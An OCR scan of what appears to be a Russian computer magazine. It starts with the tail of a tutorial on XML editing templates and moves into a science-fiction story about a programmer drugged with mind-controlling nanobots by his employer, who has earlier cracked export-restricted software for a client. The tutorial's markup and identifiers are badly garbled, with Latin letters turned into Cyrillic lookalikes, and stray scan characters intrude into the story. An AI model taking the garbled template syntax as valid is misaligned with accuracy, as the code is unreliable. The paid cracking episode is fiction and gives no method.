раФ="/агіісІе/ІіеасІ/аиФог57><Ьг/><Ьг/> 

<Ь 5ІуІе="ІопІ-зі2е:11рІ;ІопМатіІу:агіаІ" ебхІетрІаІе="ІіеІсІ:ІІо\л/" есіх- 

раШ="/агІісІеЛіеабМго"/> 

ссііѵ есМетрІаІе="Ьос1у" ебхраШ="/аі1ісІе/Ьос]у"/> 

</біѵ> 

</есІх:х[іІтІ> 

</ебх:ІетрІаІе> 

Это хороший пример коренного шаблона. Вот смотри. Внутри 
<есІх:хІіІтІ> находится хПІтІ-код, который будет сгенерирован для по- 
каза документа. Легко видеть, что для тэга <Ь> указывается пара- 
метр ебx^етрIа^е= , ЧіеIсI:Лоѵѵ I, — это означает, что содержимое эл- 
емента, путь к которому указывается параметром есІхраШ="аг1ісІе/Ііе- 
асІ/ШІе", является обычным текстом и будет выведено на экран, за- 
ключенное в <Ьх/Ь>, то есть полужирным шрифтом. Абсолютно так- 
же шаблон поступает с агіісіе/ііеасі/соттепі и /агІісІе/Ьеаб/іпІго , но 
вот элемент /агіісіе/ііеасі/аиікіогз будет обрабатываться при помощи 
отдельного шаблона аиШогз, описание которого обязательно должно 
быть приведено после коренного шаблона: 

<есіх:ІетрІаІе пате="аиШогз" Іуре="сопІаіпег" иіпате="Список авторов"> 
<есІх:таІсІі еІетепІ="аиФог"> 

<зрап есМетрІаІе="аиШог" ебхраШ="."/> 

</есІх:таІсІі> 

</ебх:ІетрІаІе> 

Этот шаблон говорит, что он является контейнером — содержит много 
однотипных элементов. С помощью тэга <есІх:таІсІі> выбираются все 
элементы аиІПог, которые обрабатываются шаблоном, который указы- 
вается в тэге зрап: есМетрІаІе^'аиІІіог": 

<ес]х:{етрІаІе пате="аиШог" Іуре="гедіоп" иіпате="Автор"> 

<есІх:х[іІтІ сНзрІау="сіеІаиИ"> 

<ІопІ есІхІетрІаІе="ІіеІсі:ІІо\А/" ебхраФ="пате"/> (<ІопІ ебхІетрІаІе="Іі- 
еІсІ:ІІоѵѵ" есІхраШ="таіІ"/>) 

</есІх:х[іІтІ> 

</ебх:ІетрІаІе> 

Этот шаблон — гедіоп, и при помощи атомарного стандартного темплей- 
та ІіеІсЫІоѵѵ выводит текстовое содержимое элементов пате и таіі. Ду- 
маю, все понятно. Документ как бы раскрывается на дерево шаблонов, 
пока не будут достигнуты текстовые данные; они выводятся с использо- 
ванием шаблона ІіеІсІ:ІІоѵѵ. 

[редактируем данные] Теперь о том, каким образом осуществляет- 
ся редактирование документов. Как и следовало бы ожидать, редактиро- 
вание разметки напрямую невозможно, для редактирования доступно 
только лишь текстовое содержимое узлов документа. Добавление новой 
информации может осуществляться либо в уже существующие узлы, ли- 
бо путем создания новых. Генерация новых элементов осуществляется 
при помощи специального тэга есіхмпзегі, который должен обязательно 
находиться внутри соответствующего шаблона, и описывается вот так: 

<есІх:іп5егЬ 

<пате>пате</пате> 

<таіІ>таіІ@таіІ.ги</таіІ> 

</есІх:іп5егЬ 

Теперь, если этот элемент вставить в шаблон аиШог, станет возможным 
добавлять в документ новых авторов. 

На самом деле, мне пора закругляться, я и так уже много написал. По 
большому счету, я сказал все, что хотел — теперь дело за тобой. Все 
равно без практики невозможно ни в чем разобраться, так что если те- 
бе стало интересно, читай доки на нашем диске и пиши мне письма по 
приведенным ссылкам © 





Авторы иллюстраций Анна Журко и Иван Величко (ѵеІ@$І"іика.ги) 
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В ЛЕСУ БЫЛО СУМРАЧНО И НЕУЮТНО. ЗЕМЛЯ ЗА ДЕСЯТКИ, А, 
МОЖЕТ, И СОТНИ ЛЕТ ПОКРЫТАЯ ТОЛСТЫМ СЛОЕМ ЕЛОВЫХ 
ИГОЛОК, ПРУЖИНИЛА ПОД НОГАМИ... I Моѳ (тое@ІапсІ.ги) 



Старые сказки или новые наноботы 

[сон] Солнце, видимо, только вставало из-за горизонта и его не было видно, каза- 
лось, что наверху еле светится само небо. Ветки больно царапали, идти прямо было 
невозможно, и, обойдя очередную елку, он понял, что заблудился окончательно. Хоте- 
лось сесть прямо на землю, обхватить колени руками и завыть от обиды. На ум прихо- 
дили только такие дебильные идеи, как найти мох на дереве и определить север, или 
залезть на елку и осмотреться. Что делать с найденным севером он представлял себе 
смутно, да и моха на стволах не было. А в свои способности залезть по липкому шер- 
шавому стволу после ежедневного многочасового сидения за компом он не верил. 
Оставалось последнее средство. Ему научил его когда-то старый знакомый отца, спо- 
койный и добрый человек. Они раньше, когда родители были еще живы, иногда встре- 
чались и много разговаривали. Однажды, когда он с юношеским азартом и горящими 
глазами рассказывал очередную теорию об устройстве мира, знакомый его остано- 
вил. «Леша, пойми одну простую вещь. Все эти идеи придуманы разумом. А разум 
предназначен всего лишь для решения насущных проблем: где поспать, что поесть, и 
не более того. Ему не дано понять этот мир. Все ответы уже есть и надо просто уметь 
их услышать. И задавать вопрос надо не своему разуму, а своей душе. Попробуй за- 
молчать, перестань мыслить и проговаривать свои мысли про себя, стань пустым и дай 
своей душе спокойно пообщаться с миром. Попробуй прямо сейчас, а я помогу». 
Самым трудным было прекратить внутренний диалог с самим собой. Но ему помогли, 
и наступила тишина. Его «я» рывком выросло и сначала «ощутило» всю квартиру, про- 
никая во все вещи и одновременно глядя на все немного сверху. Он почувствовал, как 



отец с матерью возятся на кухне, как их кот Сильвер мирно дрыхнет на шкафу. Потом 




видение изменилось, и он стал «видеть» чужие чувства. Отец светился добродушием 
и предчувствием вкусного ужина, мать была спокойна, но где-то на грани ощущалась 
недовольство и, как ему показалось, это было связано с работой. Потом объем рыв- 
ком расширился и он поднялся над городом. Только успел «оглядеться», как сразу по- 
чувствовал к себе чье-то внимание. На него кто-то посмотрел внимательно и с интере- 
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сом. Но тут все закончилось, и он рухнул обратно в свое тело. Потом 
он пробовал еще много раз, и материальный мир, который можно пос- 
мотреть и пощупать, стал казаться раскрашенным высоким забором 
вокруг мира реального. Даже попытался смотреть на программы новым 
зрением. Одни, попроще, напоминали нанизанные на нитку бусины. 
Другие, более сложные, выглядели, как кристалл или дерево с хрусталь- 
ными ветками. Дыры в программах были видны, как оборванные нити, 
за которые можно потянуть, или как трещины в стекле. 

Сначала он ощутил удивленный взгляд леса, который тоже оказался 
живым на этом уровне. И он был совсем не темным и, конечно, не злым, 
скорее таинственным и солидным. И не таким бесконечным, как каза- 
лось снизу. Всего в 15 минутах ходьбы оказалась деревня, наполненная 
жизнью. А недалеко от него шла какая-то девушка. Он пошел в ее сто- 
рону и лес, казалось, стал расступаться перед ним, признав своим. 

[явь] Он проснулся сразу, попытался вспомнить сон, но тот раство- 
рился, оставив только ощущение легкости. Валяться не хотелось, 
тело требовало движения, а мозг — работы. Такое бывало редко, 
обычно на раскачку уходило не меньше часа, кружка горячего кофе 
и пара сигарет. Попивая кофе, он потихоньку разобрал почту и еще 
немного времени потратил на просмотр любимых сайтов и форумов. 
Работы на сегодня не было. 

Уже пробежала шальная мысль прибраться в квартире, но в этот мо- 
мент звякнул почтовик. На все его ящики свалилось по одному письму, 
текст был один и тот же. Неизвестный предлагал ему постоянную рабо- 
ту, неограниченные вычислительные возможности и достойную зарпла- 
ту. Ниже перечислялось все, что он сделал за последний год (откуда уз- 
нали?) с припиской, что этого достаточно полно говорит о его квалифи- 
кации, и собеседование будет носить чисто формальный характер. 
Встретиться было предложено сегодня в 3 часа по адресу ... 

На розыгрыш это не походило и он, немного подумав, решил сходить и 
посмотреть, что ему предложат. Не каждый день попадаются люди, ко- 
торые знают о тебе столько много. Да и перебиваться разовыми заказа- 
ми уже надоело. Правда, и сидеть в офисе целый день не хотелось, но, 
что поделаешь, надо чем-то жертвовать. 

Здание, перед которым он стоял, было огромным. Казалось, что оно 
целиком состоит из синего стекла, и многократно отраженное солн- 
це придавало ему вид гигантского кристалла. Около входа висела 
только одна табличка — «Перспективные технологии». Никто не 
сновал по просторному фойе, не бегали клерки с бумагами, только 
одинокий автоматический пылесос, тихо жужжа, ползал неподалеку. 
«Так, ну и куда дальше?». 

— Здравствуйте, Алексей. Мы рады, что Вы приняли наше приглаше- 
ние, — приятный женский голос звучал, казалось, сразу отовсюду. — 
Пройдите, пожалуйста, к лифту. Вас ожидают. 

Недалеко от него, привлекая внимание, тихонько звякнул лифт и отк- 
рыл двери. Внутри не оказалось ни одной кнопки, но, как только он 
зашел, двери закрылись и через несколько секунд, открылись снова. 
Он оказался прямо в чьем-то кабинете. Кабинет был большой, но 
практически пустой, и только посередине стояли два кресла и не- 
большой столик с бумагами. 

— Здравствуйте, Алексей, проходите, — навстречу ему из кресла под- 
нялся молодой парень, — присаживайтесь. 

— Меня зовут Виктор, — продолжил молодой человек, когда Леха 
сел, — я создатель и единственный владелец компании «Перспек- 
тивные технологии». Как я вижу, наше приглашение Вас заинтере- 
совало, поэтому расскажу немного о компании и о Вашем, возмож- 
но, месте в ней. Вы, наверно, слышали фразу: «Кто владеет инфор- 
мацией — тот владеет миром»? Так вот, она верна только отчасти. 
Информацией мало владеть, ее надо уметь осмыслить и иметь воз- 
можность правильно использовать. Этим мы и занимаемся. Работ- 
ники компании делятся на три уровня в зависимости от способнос- 
тей. На нижнем уровне иерархии работают тысячи внештатных сот- 
рудников, они занимаются сбором и хранением информации. На 
среднем уровне — сотни аналитиков, к которым, надеюсь, примкне- 
те и Вы. Они занимаются анализом, поиском недостающих данных и 
подготовкой аналитических справок для верхнего уровня, на кото- 
ром работают эксперты, способные прогнозировать будущее на ос- 
нове этих данных и давать рекомендации руководству, то есть мне и 
нашим клиентам. Кроме этого, у нас есть дочерние фирмы, которые 
обеспечивают сотрудников всем необходимым: салоны красоты, 
рестораны, прокат автомобилей, автосервис, гостиницы и многое 
другое. Я вижу, у Вас есть вопросы? 

— Да, есть, — Леха сидел слегка ошарашенный, — я не совсем пони- 
маю, как смогу работать аналитиком. Я программист, возможно, непло- 
хой. Но я никогда не занимался анализом. 

— Ничего страшного, Алексей. Дело не в профессии, а в способностях, 



и по нашим данным у Вас с ними все в порядке. Но если захотите — бу- 
дете заниматься именно компьютерами. В принципе, это все, что я могу 
Вам рассказать, пока Вы не сотрудник компании. Да, еще об оплате. Я 
противник фиксированной зарплаты и считаю, что сотрудник хорошо 
работает, когда не задумывается, чем заплатить за квартиру и на что 
купить еду. Поэтому каждый сотрудник получает у нас кредитную карту 
и может тратить денег столько, сколько ему нужно. Для новых сотрудни- 
ков на первый месяц вводится дневной лимит в 100 долларов, потом ли- 
мит снимается. Это немного напоминает коммунизм, — Виктор улыб- 
нулся, — но, как видите, мы до сих пор не разорились. Это обходится до- 
роже, чем обычные формы вознаграждения, зато у сотрудников пол- 
ностью исчезает беспокойство, зависть и карьеризм. 

Виктор немного помолчал, выжидательно глядя на Алексея. 

— Ну, как? Вы согласны? 

Леха молчал. Он не верил, что может быть такое. Нашли, пригласи- 
ли, предложили барские условия, взамен только и надо что нор- 
мально работать. Может, и был какой-то подвох, но на вид все бы- 
ло прилично. Но все равно было странное ощущение, словно перед 
прыжком с тарзанки. 

— Да, я согласен. Надо что-то подписать, или как? Простите, я не знаю, 
никогда официально не работал. 

— Вот и отлично. Вот контракт, — Виктор взял со стола и протянул 
ему несколько скрепленных листов, — почитайте и, если согласны, 
подписывайте. 

Договор был составлен на таком языке, что Лехе сразу расхотелось его 
читать. Он, конечно, попытался вникнуть в смысл, но скоро окончатель- 
но запутался. Понял только одно — работодатель обязуется его всем 
обеспечивать, а он, в ответ, обязуется честно работать. Поставив под- 
пись и дату в обоих экземплярах, он протянул оба Виктору, но тот вер- 
нул один обратно. 

— Это Ваш. Ну что ж, поздравляю, — Виктор улыбнулся, — верю, что 
мы оба будем довольны нашим сотрудничеством. А теперь предлагаю 
по бокалу вина в честь такого события. 

Не успел он договорить, как в кабинет вошла девушка с подносом, на 
котором стояли два бокала. 

— С Вашего позволения я выпью розового шампанского, а Вам предло- 
жу белое сухое. Это Ваше любимое, если не ошибаюсь? 

— Да, — Алексей взял бокал и сделал небольшой глоток. Он уже давно 
хотел пить, в горле пересохло и вино пришлось как нельзя кстати. 

— Формальности займут еще неделю, так что приходите в следующий 
понедельник сюда к 9 часам, — Виктор символически отпил из бокала 
и поставил его на стол, — я Вас познакомлю с куратором, он Вам все по- 
кажет и ответит на все возникшие вопросы. 

Когда Леха допил вино, Виктор встал, показывая, что встреча законче- 
на, проводил его до лифта и на прощание пожелал ему удачи. 

Минут через двадцать Леха сидел в парке, недалеко от нового места ра- 
боты, и размышлял о происшедшем. Сигарета в руке догорела до 
фильтра, и он прикурил вторую — спешить было некуда. Придраться 
было не к чему, почти все было прилично. Непонятны были только две 
вещи: где были все работники, и почему с ним беседовал сам хозяин. 
Еще полчаса перебирал он разные варианты, порой самые фантасти- 
ческие, но потом решил не заморачиваться, встал и пошел домой. 

[сон] Девушка шла по тропинке аккуратно, стараясь не расплескать во- 
ду. Одной рукой она придерживала коромысло, на котором висели два 
полных ведра, а другой — легко покачивала в такт походке. Странно бы- 
ло, что шла она из леса, хотя недалеко, на самом краю деревни, был ви- 
ден колодец. Солнце не успело подняться высоко, остатки утреннего ту- 
мана еще были видны в низинах. Тропинка была узкая, почти заросшая, 
и края сарафана девушки потемнели от росы, которая блестела вокруг 
на траве. Он стоял на краю поляны, около высокой сосны, и смотрел на 
девушку. «Где это я?». Перевел глаза на сосну, потрогал руками кору. 
Полное ощущение реальности. Даже муравей, которого он видел до это- 
го только в мультиках, бежал вверх по стволу. Попытался отстраниться 
от всего происходящего, но иллюзия не отпускала. «Ну и ладно, пусть 
будет сказка». Ноги сами сделали два шага, отделявших его от тропин- 
ки, и он оказался с девушкой лицом к лицу. 

— Ой, ты чего, оглашенный, разве можно так людей пугать, — испуг на 
лице девушки мгновенно сменился любопытством. 

— Здравствуй, девица — черт, как там дальше в сказках — дозволь во- 
дицы испить. 

— Как ты смешно разговариваешь, — у девушки оказались замечатель- 
ные зеленые глаза, — пей, конечно, мне не жалко. 

Взяв ведро двумя руками, он осторожно наклонил его и сделал 
большой глоток прямо через край. Вода была не просто холодной, 
она была ледяной. Горло тут же свело. От неожиданности он умуд- 
рился еще и облиться. 



— Не торопись, это же родниковая вода, живая, она ничего плохого не 
сделает, — девушка прыснула в ладошку. 

Вода и правда была вкусная. Зубы ломило от холода, желудок возму- 
щенно сжался, но по телу прокатилась волна бодрости и свежести. 
Вдруг над лесом прокатился тихий звон. Он отстранился от ведра и, вы- 
тирая ладонью подбородок от капель, посмотрел назад, как будто звук 
можно было увидеть. Вокруг поляны был все тот же лес, только туман 
заклубился и стал подбираться ближе к тропинке. Он повернулся к де- 
вушке, но тропинка рядом с ним была пуста. От второго, более громко- 
го звона, туман мгновенно поднялся и накрыл его с головой. 

[явь] Леха рывком сел. Не открывая глаз, пошарил рукой по стулу 
рядом с диваном, нашел мобильник и нажал на кнопку. Звук прекра- 
тился, но сон уже ускользнул. Осталось только ощущение сказки. С 
этим ощущением он умылся, проглотил чай с бутербродом и разбу- 
дил свой компьютер. Сны снами, но за квартиру надо платить, да и 
есть иногда хочется, а карточка от нового работодателя будет еще 
неизвестно когда. Сегодня надо было закончить с взломом одной 
программы и отдать ее заказчику. Программа стоила много десятков 
килобаксов да еще и была запрещена к продаже за пределами США. 
Заказчик вышел на него несколько дней назад по рекомендации его 
сетевого знакомого, внес аванс и дал линк на скачку. Вчера он про- 
шел два уровня защиты и вышел на третий, получая истинное удо- 
вольствие от классной работы разработчиков программы. С головой 
погрузившись в работу, он не заметил, как прошел день. А, сдав ра- 
боту и получив деньги, даже немного расстроился. Скорее всего, это 
была последняя его работа такого рода. 

Вся неделя была занята какими-то мелкими делами, до которых посто- 
янно не доходили руки. Дописал пару программ, отдал долги, даже выг- 
реб из холодильника давно испортившиеся продукты и помыл его. А 
время все тянулось и тянулось. Последние два дня он просто тупо смот- 
рел телевизор, потягивая пиво. 

И вот неделя прошла. Не спалось. Завтра он первый раз в жизни вый- 
дет на официальную работу. Можно будет заказать визитки и при 
встрече представляться как аналитик компании «Перспективные техно- 
логии». А через годик-другой он будет выходить из своей новой шикар- 
ной квартиры, чмокнув на прощание красавицу жену, и на роскошной 
новенькой иномарке поедет на работу. Он отрастит живот, вместо 
джинсов и футболки будет носить дорогие костюмы. Никакого пива на 



кухне с друзьями: все встречи будут проходить только в самых лучших 
ресторанах. Представляя все это, он здорово развеселился, напряже- 
ние исчезло, и вскоре он уснул. 

[сон] Тропинка стала шире, и они пошли рядом. Девушку звали Нас- 
тей. Она жила вместе с бабушкой в старом доме с голубыми ставнями 
на краю деревни. Он не чувствовал никакого напряжения, разговари- 
вая с ней, как будто они давно друг друга знали. В настоящей жизни он 
не мог нормально общаться с девушками, стоило одной из них с ним 
заговорить, как он сразу краснел, начинал нервничать и заикаться. 

— А почему ты не берешь воду из колодца, он же ближе? 

— Там мертвая вода, ей только раны можно промывать, чтоб заросли 
быстрее. Или синяки мазать, они тогда за день проходят. А пить ее 
нельзя, нежитью станешь. Тебя что, не предупредили? 

— Кто? 

— Ну те, к кому ты приехал. Ты же не с неба сюда свалился? 

— Почти. Я ни к кому не приехал, а оказался тут случайно. 

— Подожди, — Настя остановилась и с интересом посмотрела на него, 

— так ты из этих, из параллельных? Тогда тебе надо к деду Степану. 
Они все к нему рано или поздно попадают. 

Ему вдруг показалось, что похолодало. Красивая сказка рассыпалась, 
едва успев начаться. А он был уверен, что это все только для него. И 
что скоро появятся Баба-Яга или Змей Горыныч, он будет спасать Нас- 
тю и совершать разные подвиги. 

— Настя, погоди, не тараторь, объясни нормально. Что за «парал- 
лельные»? 

— Да я сама точно не знаю. Просто иногда появляются, словно из ни- 
откуда, люди, — кто на несколько минут, кто на несколько часов. Все 
странные, словно больные, слова чудные говорят, простых вещей не 
знают. Потом пропадают. Некоторые снова приходят. Одного недавно 
с дерева снимали, быка нашего Борьку увидел и прямо взлетел на бе- 
резу. Еле-еле в себя его привели, он все про какой-то «дум» бормотал, 
а потом тоже пропал. Ладно, пойдем, я только воду домой занесу и про- 
вожу тебя к деду Степану. Только ты не пропадай, ладно? 

— Я... 

[явь] Куратором была совсем молоденькая девушка по имени Надя. 
Начала она не с экскурсии по зданию, как Леха предполагал, а сразу 
повела его в техцентр. «Что у них за лифты: кнопок нет, на какой этаж 
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приехал непонятно. Надо будет спросить, как ими управлять, а то бро- 
сят потом как котенка одного, разбирайся с ними», — думал он, пока 
они добирались до места. Техцентр больше всего напоминал комнату 
отдыха. Вдоль стен стояли диваны, на которых были разбросаны совер- 
шенно легкомысленные подушечки. Несколько кресел, глядя на кото- 
рые хотелось сесть в них и, откинувшись, беззаботно вздремнуть, стоя- 
ли по всей комнате. В комнате никого не было. 

— Они все к экспертам ушли, что-то там случилось, — сказала Надя, по- 
додвигая одно из кресел в центр комнаты прямо на большой белый круг, 
нарисованный на полу, — садитесь, я сама все сделаю. Будет не боль- 
но, — она улыбнулась, — немного пошумит в голове — и все. 

Леха сел в кресло, что-то ему переставало это нравиться, но девушка 
ждала, и от мысли, что она может подумать, что он струсил, его бро- 
сило в краску. 

Кресло было приятно прохладным, оно немного изогнулось под весом 
тела и подстроилось под его форму. Несколько секунд ничего не проис- 
ходило, потом как будто кто-то подул на затылок, щелкнуло в ушах и на 
мгновение потемнело в глазах. Шум в голове нарастал, захватил весь 
мозг и плавно растаял. 

— Ну, вот и все, как ощущения? — Надя стояла рядом и вопросительно 
^ смотрела на него. 

(О — Да, вроде, все нормально, пошумело только, — Леха попытался 
встать с кресла, но голова резко закружилась. 

— Не вставайте, посидите минут десять. Попробуйте самостоятельно 
понять, что произошло. Я Вас оставлю, когда понадоблюсь — позовите, 
— девушка быстро вышла, не оставив ему шанса задать вопрос. 

Леха не так представлял себе официальную работу. В мыслях он предс- 
тавлял, что посадят его за какой-нибудь стол в комнате с другими, он 
настроит комп под себя, бумажки какие-нибудь почитает, сам что-ни- 
о будь будет писать. А тут не работа, а институт мозга какой-то. 

^ «Да что за фигня тут происходит, в конце концов!», 

о «Было активировано взаимодействия сети наноботов и центральной 

^ нервной системы», — мысль родилась в его голове как бы сама собой. 

* «Каких еще наноботов, ты — кто?» 

21, «В определенном смысле, я безличностный коллективный разум, всех 



находящихся достаточно близко сотрудников компании, и твое подсоз- 
нание в том числе. С помощью внедренных тебе неделю назад ботов, 
произведенных компанией по нанотехнологии, была собрана сеть, сое- 
диняющая все части мозга, в том числе неиспользуемые, резервные, 
спящие и отвечающие за долгосрочную память, в единый комплекс. На 
данный момент использование мозга повышено с 10%, как у обычных 
людей, до 25%. В течение месяца планируется довести до 75%, более 
быстрая активация нежелательна из-за возможного психологического 
шока. В качестве дополнительных возможностей смонтирован узел 
связи, поддерживающий контакт на расстоянии до 1000 метров с лю- 
бым индивидом с аналогичной структурой мозга и возможностью аудио- 
визуального моделирования без участия органов чувств». 

«А поподробнее про «внедренных мне» и про остальное». 

«Внедрение — стандартная операция с новичками. Ты получил набор 
наноботов вместе с бокалом вина после подписания контракта. В конт- 
ракте, кстати, про это было написано. В течение недели боты с потоком 
крови перемещались в мозг и подсоединялись к нервной системе». 
Внезапно, прямо в воздухе, перед ним возникло объемное изображе- 
ние мозга, полностью опутанного мелкой сетью, узелки сети подсвечи- 
вались оранжевым цветом. 

«Это модель твоего мозга, оранжевые точки — колонии наноботов. 
Желтое пятно на затылке, — небольшое круглое пятно на модели 
вспыхнуло, — модуль связи и визуализации». 

«Зачем мне все это?». 

«В твои обязанности входит анализ. Данные собираются везде, где 
только можно, другими сотрудниками, они, как гигантские базы дан- 
ных, готовы мгновенно предоставить нужные данные. Ты эти данные 
будешь обрабатывать. Для тебя это будет выглядеть, будто ты просто 
размышляешь, и в нужный момент происходит озарение». 

«А обычным компьютерам это нельзя было поручить?» 

«Можно, но компьютеры оперируют только понятиями «истина» и 
«ложь», тогда как человек оперирует многозначной логикой, где кроме 
них есть еще и «возможно», «маловероятно» и так далее. Кроме того, 
мозг опережает компьютер на несколько порядков по скорости и объе- 
му памяти. По нашим прогнозам компьютеры, без нашей помощи, смог- 
ли бы достичь уровня обычного человека не раньше 2058 года». 

«А с помощью?» 

«Никогда. Наши разработки делают компьютеры ненужными как 
класс, и они исчезнут как массовое явление примерно через десять 
лет. Останутся только специализированные, без интеллекта. В маши- 
нах, станках и т.п.». 

«А как же тогда будем жить? Что еще исчезнет, что появится», — Леха 
плохо представлял себе жизнь без компьютеров, и любопытство прямо 
раздирало его. 

«Не будет отдельных рабочих мест, зачем ехать куда-то, если можно 
делать это же дома или где-нибудь в парке, только виртуально. Машин 
станет в сотни раз меньше, ведь ездить ни к чему. Не будет теле- и ви- 
деотехники. Захотел экран — он уже перед тобой, информация переда- 
ется прямо в мозг, в зрительные области. Не нужно будет такое разно- 
образие еды: достаточно уже разработанной питательной массы, а 
мозг будет ощущать любой внешний вид и вкус, который ты захочешь. 
Много чего изменится, все не расскажешь. Сам потом спрогнозируешь, 
если интересно будет, или посмотришь наши расчеты». 

«Но так можно дойти и вообще до виртуальной жизни, как в Матрице». 
«Да, так и будет, по прогнозам через 50 лет около 60% людей добро- 
вольно будет жить только виртуально». 

Они беседовали весь день, обсуждая разные аспекты новой техноло- 
гии. Изредка их прерывала Надя, которая следила, как у него проходит 
адаптация. К концу дня Алексей уже начал привыкать к новым способ- 
ностям, исследовал здание, посмотрел прогнозы. 

На следующий день он уже начал работать. На первый взгляд, зада- 
ния были невыполнимыми, но после начала анализа — оказывались 
довольно простыми. Для начала ему удалось вычислить автора виру- 
са, разваливающего Интернет на части, парень был очень способ- 
ный, и ему хотели предложить работу. Легкость, с которой Леха по- 
лучал доступ к серверам, его поразила, похоже, в его распоряжении 
были знания лучших хакеров. 

Неделя работы пролетел незаметно. Дома он только ночевал: все вре- 
мя проводил в здании из синего стекла. Рабочее место у него все-таки 
было — небольшая комната с единственным креслом. Но он сразу пос- 
ле прихода на работу мысленно его преобразовывал — то оказываясь 
на берегу моря, то на опушке леса. 

Однажды, когда он утром собирался уйти на работу, взгляд случайно 
упал на фотографию на комоде. На ней были какие-то мужчина и жен- 
щина. Он долго пытался понять, кто они, пока, наконец, не дошло — ро- 
дители. Как он мог забыть? Попытался вспомнить детство и ... ничего. 
Ну не совсем ничего, конечно. Первый день в школе вспомнил, но кто 



его отвел — нет. Кто сидел с ним за партой — нет, а как звали первую 
учительницу, вспомнил мгновенно. Но это была не его память, это он 
вычислил в какой-то базе данных по своей фамилии, номеру класса и 
году учебы. Вдруг стало страшно. 

Всю дорогу до работы он пытался вспомнить что-нибудь еще из 
детства, но перед внутренним взором всплывали только отдельные 
картинки, никак не связанные друг с другом. Как будто листал старый 
фотоальбом, из которого выпала большая часть фоток. 

«Показать зоны памяти в моем мозге и зоны, используемые ботами». 
Перед ним возникла объемная модель его мозга, раскрашенная разны- 
ми цветами. Кратковременная память была не задета, а долговремен- 
ная более чем на половину была захвачена ботами. 

«Показать ситуацию после полной адаптации!». Долговременной памя- 
ти практически не было. Мозг контролировался почти полностью. 

«Как остановить адаптацию?» 

Он не успел додумать мысль, как тело скрутило от боли, и разум 
потух. Очнулся уже на полу, с противно дрожащим телом и сла- 
бостью в голове. 

«Ты коснулся запрещенной темы», — произнес в голове участливый го- 
лос Виктора, — заранее предупреждать не стали, чтобы урок был наг- 
ляднее, в следующий раз наказание будет сильнее и дольше. 

«Могли бы и предупредить. А что еще запрещено? А то нарываться что- 
то больше не хочется», — даже думать было неприятно и больно, и еще 
Лехе жутко хотелось материться. 

«Запрещено все, что связано с уничтожением и ограничением ботов, 
запрещено просчитывать свое будущее. Запомнил?». 

«Да. Попробуй такое забудь». 

«Вот и славно. Немного отдохни и продолжай работать», — Виктор отк- 
лючился. 

«Твою мать, вот это я попал», — Леха кое-как забрался в кресло. Боле- 
ло все и с трудом заглушив мысли и чувства, он «вышел» из тела, в 
первый раз за все время работы тут. Боль отпустила сразу, вернее, она 
осталась в теле. 

— О как, да ты, парень, экстрасенс! — голос-мысль исходила от полуп- 
розрачного человека, небрежно развалившегося прямо в воздухе неда- 
леко от него. 

— Ты еще кто? — Леха удивился. Он первый раз встретил другую ду- 
шу лицом к лицу, хотя чужое внимание и взгляды ощущал и раньше. 

— Зови меня Марат. Я тут самое старое «привидение». Люблю, пони- 
маешь, за новичками наблюдать. 

— «Самое старое»? А что, вас тут много? 

— Не считал, но сотни три, я думаю, будет. Практически все эксперты 
и некоторые из аналитиков. 

— Не понял. Они все умерли, что ли? 

— Да нет. Их тела на верхнем этаже в специальных боксах. Работают 
так же, как и мое. Видишь ли, когда боты захватывают весь мозг, тело 
впадает как будто в кому и душе больше не за что держаться. Остает- 
ся только небольшая ниточка, которая нас связывает, но пока она есть 

— мы не можем уйти совсем. Вот и таскаемся неподалеку, ждем, когда 
тело умрет. Но, похоже, зря ждем. Виктор нашел способ, как перестро- 
ить тела, и, видимо, они стали вечными. 

— А у него самого ботов нет? 

— Есть, только он и до них умным был, вот и ограничил своих. Они 
больше половины мозга использовать не могут. Ему хватает, а если не 
хватает — он использует таких, как мы. 

— Слышь, а откуда ты все это знаешь? Ну, про Виктора и вообще? 

— Так я же это все создал. И ботов, и всю технологию. Сам на себе пер- 
вом и попробовал. Только, когда про необходимость ограничения сооб- 
разил, было уже поздно. Боты весь мозг захватили и попутно душу мою 
бедную выперли. А Виктор у меня ассистентом был. Программу ботов 
подправил и на других испытал. Как стал стабильный результат полу- 
чаться, он и себе их ввел. Себе 50% установил, работягам — 75%. Ну а 
тем, кто сильно умным оказывался и начинал качать права, с того сни- 
мали ограничения — ив бокс на полное жизнеобеспечение. 

— А как он это делает? 

— Не знаю. Я такую возможность не закладывал, это уже его идея. 

— И что, у нас никаких шансов? 

Марат немного помолчал, потом переместился поближе к Лехе. 

— Мне жаль, парень, но, похоже, что нет никаких. Я, по крайней мере, 
выхода не вижу, да и ребята — тоже. Возвращайся в свое тело, живи, 
пока можешь. И сильно не умничай. Если захочешь — приходи, побол- 
таем, — и он растаял в воздухе, оставив Леху одного. 

[сон] Старик встретил их радушно, без удивления. Скоро они уже си- 
дели за самодельным столом в яблоневом саду за его домом, и пили 
какой-то напиток из трав, успокаивающий и бодрящий одновременно. 

— Много вас стало приходить в последнее время, парень. Что-то в ва- 



шем мире происходит неправильное. Взрослые люди всегда приходили 
и приходят, но они — путешественники, искатели истины. А теперь все 
больше молодые, случайные. 

— Дедушка, что значит «приходят»? Откуда и куда? Ничего понять не 
могу. Я никуда не шел, просто уснул и оказался здесь. Я даже толком 
не понимаю, где это — «здесь». 

— Изначально мир был един, в нем жили драконы и другие низшие 
духовные существа, люди всех воплощений и даже аватары, почти 
боги. Но потом создатель разделил их, разведя на разные планы 
духовного бытия. Мир стал состоять из разных уровней: от ада до 
рая. Твой мир — последний уровень ада, наш — первый из духов- 
ных. Человек, достигший предела духовного развития своего уров- 
ня, умирает и рождается заново уже на следующем, более высо- 
ком. Некоторые, у вас их называют Учителями или просвещенны- 
ми, могут заглядывать к нам ненадолго еще при жизни, они это на- 
зываю путешествием в астрал. Не удивляйся, что я много знаю про 
вас, я — привратник этого мира, один из многих, часто беседую с 
гостями и иногда посещаю ваш мир. 

Старик помолчал, маленькими глотками прихлебывая из кружки. По- 
том внимательно посмотрел на притихшего гостя и продолжил. 

— Ты, парень, почти созрел для перехода, дожив жизнь до конца, ты 
возродился бы здесь, но сейчас что-то или кто-то выдавливает твою ду- 
шу из твоего тела, а на вашем уровне одно без другого существовать 
полноценно не может. У нас с этим проще, тело всего лишь отражение 
души, — облик старика вдруг поплыл и через секунду на них уже смот- 
рел молодой кудрявый парень лет 20, подмигнул, улыбнулся и снова 
превратился в старика. 

— И что мне теперь делать? 

— Чашу страданий надо испить до конца. Ты можешь остаться здесь, 
я помогу, но будешь инвалидом пока твое тело там доживает. Хотя 
жизнью это назвать сложно, возможно, для тела это будет кома или 
что-то вроде зомби. Или вернись, разберись со своими проблемами, 
